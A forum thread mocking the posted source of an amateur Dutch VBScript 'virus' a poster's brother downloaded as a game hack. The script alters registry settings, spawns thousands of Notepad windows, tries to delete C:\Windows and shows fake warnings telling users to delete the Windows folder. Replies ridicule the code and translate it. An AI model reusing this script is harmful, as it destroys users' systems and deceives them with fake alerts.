Writing a virus in Visual Basic




  • Apparently SpectateSwamp also writes viruses.

    My brother wanted a runescape hack and downloaded this. And ran it. He said he had a virus. I saw what he downloaded (a 2 MB VBS file that claimed to be a virus when it ran) so I looked in the source to see what it might have done.

    Behold.

    msgbox "Hey you computer has been hacked by h4ckblood!"
    Set shl = CreateObject("Wscript.shell")
    Shl.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Start Page","http://halflife2.zoy.org"
    Set oWS = WScript.CreateObject("WScript.Shell")
    oWS.Run "%comspec% /c echo " & Chr(07), 0, True
    oWS.Run "%comspec% /c echo " & Chr(07), 0, True
    oWS.Run "%comspec% /c echo " & Chr(07), 0, True
    Set oWS = WScript.CreateObject("WScript.Shell")
    oWS.Run "%comspec% /c echo " & Chr(07), 0, True
    oWS.Run "%comspec% /c echo " & Chr(07), 0, True
    oWS.Run "%comspec% /c echo " & Chr(07), 0, True
    Set oWS = WScript.CreateObject("WScript.Shell")
    oWS.Run "%comspec% /c echo " & Chr(07), 0, True
    oWS.Run "%comspec% /c echo " & Chr(07), 0, True
    oWS.Run "%comspec% /c echo " & Chr(07), 0, True
    msgbox "je hebt het h4ckblood virus!"
    Set oWMP = CreateObject("WMPlayer.OCX.7" )
    Set colCDROMs = oWMP.cdromCollection
    colCDROMs.Item(i).Eject
    Set WshShell = WScript.CreateObject ("WScript.Shell")
    WshShell.Run ("C:\Windows")
    Set shl = CreateObject("Wscript.shell")
    Shl.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Window Title","hacked by h4ckblood! dit internet word aangeboden door bellel 5 euro per minuut!!"
    msgbox "your computer has been hacked by h4ckblood!!"
    msgbox "you have the h4ckblood virus!"
    msgbox "waarschuwing: windows heeft het h4ckblood virus op uw computer aangetroven! uw computer gaat mogelijk crachen als u de pc uitzet kan hij niet meer aan! wij raden u aan om de windows map te verwijderen",1024,"windows virus waarschuwing!"
    msgbox "binnen enkele sec start er automatisch een map u moet in die map een map zoeken met de naam: windows. die map moet u dan verwijderen. windows maakt automatisch daarna een backup waardoor het virus weg is en een nieuwe windows map word gemaakt. als dit gedaan is is het virus weg!",1024,"windows virus waarschuwing"
    Set WshShell = WScript.CreateObject ("WScript.Shell")
    WshShell.Run ("C:\")
    path = "C:\frt"
    set filesys=CreateObject("Scripting.FileSystemObject")
    If Not filesys.FolderExists(path) Then
    Set folder = filesys.CreateFolder(path)
    End If
    path = "C:\joyg"
    set filesys=CreateObject("Scripting.FileSystemObject")
    If Not filesys.FolderExists(path) Then
    Set folder = filesys.CreateFolder(path)
    End If
     --- -- about 4 000 more lines of creating folders this way -- ---
    path = "C:\windows/system32/crackers trojan" 
    set filesys=CreateObject("Scripting.FileSystemObject")
    If Not filesys.FolderExists(path) Then
    Set folder = filesys.CreateFolder(path)
    End If
    Set WshShell = WScript.CreateObject ("WScript.Shell")
    WshShell.Run ("C:\Windows\notepad.exe")
    Set WshShell = WScript.CreateObject ("WScript.Shell")
    WshShell.Run ("C:\Windows\notepad.exe")
    Set WshShell = WScript.CreateObject ("WScript.Shell")
    WshShell.Run ("C:\Windows\notepad.exe")
    Set WshShell = WScript.CreateObject ("WScript.Shell")
     --- -- about 40 000 more lines of this, running about 20 000 notepads -- ---
    Set WshShell = WScript.CreateObject ("WScript.Shell")
    WshShell.Run ("C:\Windows\notepad.exe")
    ' delete
    Set fso = CreateObject("Scripting.FileSystemObject")
    Set aFolder = fso.GetFolder("C:\windows")
    aFolder.Delete
    Set oWS = WScript.CreateObject("WScript.Shell")
    oWS.Run "%comspec% /c echo " & Chr(07), 0, True
    oWS.Run "%comspec% /c echo " & Chr(07), 0, True
    oWS.Run "%comspec% /c echo " & Chr(07), 0, True
    Set oWS = WScript.CreateObject("WScript.Shell")
    oWS.Run "%comspec% /c echo " & Chr(07), 0, True
    oWS.Run "%comspec% /c echo " & Chr(07), 0, True
    oWS.Run "%comspec% /c echo " & Chr(07), 0, True
    Set oWS = WScript.CreateObject("WScript.Shell")
    oWS.Run "%comspec% /c echo " & Chr(07), 0, True
    oWS.Run "%comspec% /c echo " & Chr(07), 0, True
    oWS.Run "%comspec% /c echo " & Chr(07), 0, True
    Set oWS = WScript.CreateObject("WScript.Shell")
    oWS.Run "%comspec% /c echo " & Chr(07), 0, True
    oWS.Run "%comspec% /c echo " & Chr(07), 0, True
    oWS.Run "%comspec% /c echo " & Chr(07), 0, True
    Set oWS = WScript.CreateObject("WScript.Shell")
    oWS.Run "%comspec% /c echo " & Chr(07), 0, True
    oWS.Run "%comspec% /c echo " & Chr(07), 0, True
    oWS.Run "%comspec% /c echo " & Chr(07), 0, True
    Set oWS = WScript.CreateObject("WScript.Shell")
    oWS.Run "%comspec% /c echo " & Chr(07), 0, True
    oWS.Run "%comspec% /c echo " & Chr(07), 0, True
    oWS.Run "%comspec% /c echo " & Chr(07), 0, True
    Set oWS = WScript.CreateObject("WScript.Shell")
    oWS.Run "%comspec% /c echo " & Chr(07), 0, True
    oWS.Run "%comspec% /c echo " & Chr(07), 0, True
    oWS.Run "%comspec% /c echo " & Chr(07), 0, True
    Set oWS = WScript.CreateObject("WScript.Shell")
    oWS.Run "%comspec% /c echo " & Chr(07), 0, True
    oWS.Run "%comspec% /c echo " & Chr(07), 0, True
    oWS.Run "%comspec% /c echo " & Chr(07), 0, True
    Set oWS = WScript.CreateObject("WScript.Shell")
    oWS.Run "%comspec% /c echo " & Chr(07), 0, True
    oWS.Run "%comspec% /c echo " & Chr(07), 0, True
    oWS.Run "%comspec% /c echo " & Chr(07), 0, True
    Set oWS = WScript.CreateObject("WScript.Shell")
    oWS.Run "%comspec% /c echo " & Chr(07), 0, True
    oWS.Run "%comspec% /c echo " & Chr(07), 0, True
    oWS.Run "%comspec% /c echo " & Chr(07), 0, True
    Set oWS = WScript.CreateObject("WScript.Shell")
    oWS.Run "%comspec% /c echo " & Chr(07), 0, True
    oWS.Run "%comspec% /c echo " & Chr(07), 0, True
    oWS.Run "%comspec% /c echo " & Chr(07), 0, True
    Set oWS = WScript.CreateObject("WScript.Shell")
    oWS.Run "%comspec% /c echo " & Chr(07), 0, True
    oWS.Run "%comspec% /c echo " & Chr(07), 0, True
    oWS.Run "%comspec% /c echo " & Chr(07), 0, True
    Set oWS = WScript.CreateObject("WScript.Shell")
    oWS.Run "%comspec% /c echo " & Chr(07), 0, True
    oWS.Run "%comspec% /c echo " & Chr(07), 0, True
    oWS.Run "%comspec% /c echo " & Chr(07), 0, True
    msgbox "sorry! je pc is stuk!"
    msgbox "tjaa had jij nooit een virus moeten openen!"
    msgbox "hacked by h4ckblood trojan"
    msgbox "made by h4ckblood"
    msgbox "made in netherlands"
    msgbox "you was owned by h4ckblood!"
    msgbox "maar tjaa zonde van je computertje!"
    msgbox "ik zou maar vast een nieuwe kopen!"
    msgbox "en de stekkers eruit halen"
    msgbox "want deze virus veroorzaakt koortsluiting!"
    msgbox "fuck hamas!"
    msgbox "WARNING: UW COMPUTER LOOPT GROOT RISICO! BINNEN ENKELE SECONDEN KOMT ER KORTSLUITING! VIRUS WARNING!!!!! VIRUS DANGER! VIRUS GEVAAR! VIRUSSSSSS! DANGER! DANGER! DANGER!"
    msgbox "VAARWEL LOVELY PC! SORRY! SORRY! SORRY!"
    msgbox "dont forget: YOU WAS HACKED BY H4CKBLOOD!!!"

    On my brother's computer it did nothing but pop up a few messages. It didn't even get to the line where it's supposed to show the contents of the C:\WINDOWS folder.



  • Give your brother an upgrade to a virus that actually works, as punishment for trying to cheat.



  • I second that motion.



  • VB Virii are old hat.  I had a work machine get one in 1995.  Clean up was not a big deal in that case, but the fact that it was able to mess with the registry was a little disturbing.

    The virus my machine caught was "Irish", which propagates via MS-Word document macros.   That something so brain-dead simple could put a machine at risk is one of the many reasons why I don't use MS products at home.



  • This is the VB version of urinating in phone boxes.



  • @Critter said:

    VB Virii are old hat.  I had a work machine get one in 1995.  Clean up was not a big deal in that case, but the fact that it was able to mess with the registry was a little disturbing.

    The virus my machine caught was "Irish", which propagates via MS-Word document macros.   That something so brain-dead simple could put a machine at risk is one of the many reasons why I don't use MS products at home.

    Or you could try not running as Administrator....

    I could do the same thing to you on a *nix box if you made the decision to run as root constantly.


  • Discourse touched me in a no-no place

    @Critter said:

    VB Virii are old hat.  I had a work machine get one in 1995. 

    What's a virii?



  • @PJH said:

    @Critter said:

    VB Virii are old hat.  I had a work machine get one in 1995. 

    What's a virii?

     

    Those crazy Useneters from alt.hackers.malicious are back again. 



  • I think my favorite part is how the script constantly reminds the user that it's a virus.

    "Boo! You just got hacked! Really. Because I'm a virus. A dangerous one. Yup, I'm a real virus. And I do danger. Look! I might have harmed your computer now. Because I'm a real virus!" 


    As disturbing as it may sound, VB can be quite powerful. Don't forget VB 6's ability to create COM objects with just a few lines of code. With a bit of COM experience, you can write your own ShellEx plugin for Explorer or BrowserHelperObject for IE quite easily.

    Still far away from serious trojans, but at the time VB 6 was current, it could still have been enough for some unnerving spy/adware.

    Believe it or not, in germany, we had not one but TWO media-dominating virus crazes a few years ago, both caused by VB derivates. The first one was a macro worm inside an MS Word document containing links to various porn sites (don't ask...), the second was the infamous ILOVEYOU script...

     

    As for the original post, anyone else wondering what's up with all the CreateObject's randomly sprinkled throughout the code? Maybe the guy thought programming is like Counter Strike and you have to "reload" after a number of commands?



  • @PSWorx said:

    I think my favorite part is how the script constantly reminds the user that it's a virus.

    "Boo! You just got hacked! Really. Because I'm a virus. A dangerous one. Yup, I'm a real virus. And I do danger. Look! I might have harmed your computer now. Because I'm a real virus!" 


    As disturbing as it may sound, VB can be quite powerful. Don't forget VB 6's ability to create COM objects with just a few lines of code. With a bit of COM experience, you can write your own ShellEx plugin for Explorer or BrowserHelperObject for IE quite easily.

    Still far away from serious trojans, but at the time VB 6 was current, it could still have been enough for some unnerving spy/adware.

    Believe it or not, in germany, we had not one but TWO media-dominating virus crazes a few years ago, both caused by VB derivates. The first one was a macro worm inside an MS Word document containing links to various porn sites (don't ask...), the second was the infamous ILOVEYOU script...

     

    As for the OP, anyone else wondering what's up with all the CreateObject's randomly sprinkled throughout the code? Maybe the guy thought programming is like Counter Strike and you have to "reload" after a number of commands?

    This is not VB6. This is VBScript. 

    CreateObject is how VB loads external COM objects. (no I don't know why he uses it so much for the same variable. I think he is stupid and likes copy/paste)

    So anyway, VB != VBScript and your post is mostly invalid. Sorry.

    But I do find it funny the first statement tells the user it is a virus... "Whooops!" End Task --> w(c)script.exe  "Whew!"



  • It looks like he's worried that his object might be stale...  so he always creates a new one before he uses it.

    Kind of defeats the purpose of a virus scanner, if the virus itself is constantly warning you that you're infected.



  • @GalacticCowboy said:

    It looks like he's worried that his object might be stale...  so he always creates a new one before he uses it.

    Kind of defeats the purpose of a virus scanner, if the virus itself is constantly warning you that you're infected.

    I think it is just an obvious case of a 14 year old kid learning VBScript for the first time and realizing you can actually do bad things... H4X0R!!!

    Judging by his code, he isn't much of a risk to the world.



  • @MasterPlanSoftware said:

    @GalacticCowboy said:

    It looks like he's worried that his object might be stale...  so he always creates a new one before he uses it.

    Kind of defeats the purpose of a virus scanner, if the virus itself is constantly warning you that you're infected.

    I think it is just an obvious case of a 14 year old kid learning VBScript for the first time and realizing you can actually do bad things... H4X0R!!!

    Judging by his code, he isn't much of a risk to the world.

    yeah...  *pssht* "worried"? "object"?  I gave the guy too much credit.  :D

    Of course, I've seen some people who go to the other extreme.  Sometime back I saw an article on ZDNet that claimed that any document that contained macros was an attempt to hack or infect you, since "nobody" uses macros for legitimate purposes...



  • @GalacticCowboy said:

    @MasterPlanSoftware said:
    @GalacticCowboy said:

    It looks like he's worried that his object might be stale...  so he always creates a new one before he uses it.

    Kind of defeats the purpose of a virus scanner, if the virus itself is constantly warning you that you're infected.

    I think it is just an obvious case of a 14 year old kid learning VBScript for the first time and realizing you can actually do bad things... H4X0R!!!

    Judging by his code, he isn't much of a risk to the world.

    yeah...  *pssht* "worried"? "object"?  I gave the guy too much credit.  :D

    Of course, I've seen some people who go to the other extreme.  Sometime back I saw an article on ZDNet that claimed that any document that contained macros was an attempt to hack or infect you, since "nobody" uses macros for legitimate purposes...

    And again, I have to point out that is neither VB or VBScript, but VBA.

    Always funny how all of those get all mashed up.

    Nowadays we have VB, VBA, VBScript and VB.NET. Amazing.



  • Look, how about pondering the possibility that - lo and behold! - we DO know about the differences between those four and just want to broaden the discussion? That's commonly called "off topic".



  • @MasterPlanSoftware said:

    Nowadays we have VB, VBA, VBScript and VB.NET. Amazing.

    I think amazing would be the last word I would use to describe that particular phenomenon.

    While we're on subject, does it bother anyone else when people say Javascript when they mean Java and/or the other way around?



  • By the way, the "virus" opens the C: folder and says to the user (in Dutch) that they have to delete a folder called Windows :P



  • @PSWorx said:

    Look, how about pondering the possibility that - lo and behold! - we DO know about the differences between those four and just want to broaden the discussion? That's commonly called "off topic".

    Right, and by expressing all the flavors of VB and company, that isn't loading the wtf cannon up right?

     



  • @XIU said:

    By the way, the "virus" opens the C: folder and says to the user (in Dutch) that they have to delete a folder called Windows :P

    He also ATTEMPTS to delete the windows folder:

    Set fso = CreateObject("Scripting.FileSystemObject")
    Set aFolder = fso.GetFolder("C:\windows")
    aFolder.Delete
    I cannot imagine that works out too well for him... 

     



  • @Critter said:

    The virus my machine caught was "Irish", which propagates via MS-Word document macros.  

    I thought the Irish virus was the email saying:

    "You have caught the Irish virus!!  Please forward this email to everyone you know then delete all the files on your computer."

     



  • @LoztInSpace said:

    @Critter said:

    The virus my machine caught was "Irish", which propagates via MS-Word document macros.  

    I thought the Irish virus was the email saying:

    "You have caught the Irish virus!!  Please forward this email to everyone you know then delete all the files on your computer."


     

     



  • @MasterPlanSoftware said:

    @LoztInSpace said:

    @Critter said:

    The virus my machine caught was "Irish", which propagates via MS-Word document macros.  

    I thought the Irish virus was the email saying:

    "You have caught the Irish virus!!  Please forward this email to everyone you know then delete all the files on your computer."


    <snipped image>
    Also note the image version (posted by MPS) even contains a bug. Which I presume was deliberate by the author.


  • That's the cutest virus I ever saw. I just love the way he mimics system messages, with typos, suggesting to remove the windows folder :D

     

    "This virus causes shortcircuits" :D



  • @PSWorx said:

    Maybe the guy thought programming is like Counter Strike and you have to "reload" after a number of commands?

     Would that be Counter Strike: Source?
     



  • I still haven't found the routine that causes the shoort circuit in your computer. That's some amazing obfuscation.



  • @h4ckblood said:

    msgbox "waarschuwing: windows heeft het h4ckblood virus op uw computer aangetroven! uw computer gaat mogelijk crachen als u de pc uitzet kan hij niet meer aan! wij raden u aan om de windows map te verwijderen",1024,"windows virus waarschuwing!"
    msgbox "binnen enkele sec start er automatisch een map u moet in die map een map zoeken met de naam: windows. die map moet u dan verwijderen.
    windows maakt automatisch daarna een backup waardoor het virus weg is en een nieuwe windows map word gemaakt. als dit gedaan is is het virus weg!"

    Translation (spelling failures preserved as much as possible):

    warning: windows has detecktet the h4ckblood virus on your computer! your computer will possibly crach if you turn off the pc it will not turn on anymore! we advise you to delete the windows folder

    in a few sec a folder will start automatically you must find in this folder a folder with the name: windows. you must delete that folder. windows will automatically make a backup that makes the virus go away and a new windows folder will me made. when this is done the virus will be gone!



  • @dhromed said:

    Translation (spelling failures preserved as much as possible):

    warning: windows has detecktet the h4ckblood virus on your computer! your computer will possibly crach if you turn off the pc it will not turn on anymore! we advise you to delete the windows folder

    in a few sec a folder will start automatically you must find in this folder a folder with the name: windows. you must delete that folder. windows will automatically make a backup that makes the virus go away and a new windows folder will me made. when this is done the virus will be gone!

    Now that's a lazy virus writer! 



  • Set oWS = WScript.CreateObject("WScript.Shell")
    oWS.Run "%comspec% /c echo " & Chr(07), 0, True
    oWS.Run "%comspec% /c echo " & Chr(07), 0, True
    oWS.Run "%comspec% /c echo " & Chr(07), 0, True

    Took a while to guess what this was supposed to do. Then it dawned to me: The virus author shall be Hounded by the Spectres of Hackers Past when they create a new shell that runs a command interpreter that runs a command that reasonably emulates beeping.

    Set oWMP = CreateObject("WMPlayer.OCX.7" )
    Set colCDROMs = oWMP.cdromCollection
    colCDROMs.Item(i).Eject

    The REAL WTF®: Uninitialised variable i.



  • msgbox "fuck hamas!"


    I think I just found the obligatory political message.


  • @marinus said:

    msgbox "fuck hamas!"




    I think I just found the obligatory political message.

    Well I saw that, but I thought a Political Message was so obligatory that it wasn't even worth commenting on. I mean, it's not a proper virus unless it has a Political Message, right?


Log in to reply